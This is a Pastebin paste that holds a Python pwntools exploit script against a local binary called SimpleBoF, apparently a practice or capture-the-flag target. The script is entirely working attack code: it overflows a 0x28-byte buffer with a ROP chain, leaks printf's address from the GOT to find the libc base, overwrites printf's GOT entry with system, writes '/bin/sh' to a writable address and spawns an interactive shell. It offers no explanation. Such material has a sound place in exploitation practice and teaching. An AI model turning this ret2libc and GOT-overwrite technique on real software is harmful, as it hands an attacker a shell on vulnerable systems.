Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- e = ELF('./SimpleBoF')
- s = process(e.path)
- #s = remote('localhost', 6969)
- #s = gdb.debug(e.path)
- poprdi = 0x400623
- formatstring = 0x400650
- poprsi_popr15 = 0x400621
- writeable_addr = 0x601040
- printf_got = 0x601018
- printf_plt = 0x400450
- gets_plt = 0x400480
- system_offset = 0x3f450
- printf_offset = 0x4f160
- gets_offset = 0x68630
- binsh_offset = 0x1619f9
- # step 1: leaking printf address
- buff = 0x28
- payload = 'A' * buff
- payload += p64(poprsi_popr15)
- payload += p64(printf_got)
- payload += p64(0xdeadbeef)
- payload += p64(poprdi)
- payload += p64(formatstring)
- payload += p64(printf_plt)
- # step 2: overwrite printf GOT with system using gets@plt: rdi -> printf@got
- payload += p64(poprdi)
- payload += p64(printf_got)
- payload += p64(gets_plt)
- # step 3: read "/bin/sh" to writeable address
- payload += p64(poprdi)
- payload += p64(writeable_addr)
- payload += p64(gets_plt)
- # step 4: rdi -> writeable and call printf@plt
- payload += p64(poprdi)
- payload += p64(writeable_addr)
- payload += p64(printf_plt)
- print "stage 1: leaking printf address"
- s.sendline(payload)
- print "payload sent"
- #gdb.attach(s)
- addr = s.recv().strip()[-6:] + '\x00\x00'
- printf_addr = u64(addr)
- print "printf is @ " + str(hex(printf_addr))
- libc_base_addr = printf_addr - printf_offset
- print "libc base address: " + str(hex(libc_base_addr))
- system_addr = libc_base_addr + system_offset
- print "system is @ " + str(hex(system_addr))
- binsh_addr = libc_base_addr + binsh_offset
- print "//bin//sh is @ " + str(hex(binsh_addr))
- gets_addr = libc_base_addr + gets_offset
- print "gets is @ " + str(hex(gets_addr))
- print "stage 2: sending system address"
- s.sendline(p64(system_addr))
- print "stage 3: sending /bin/sh to writeable address"
- s.sendline("/bin/sh")
- s.interactive()
- s.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement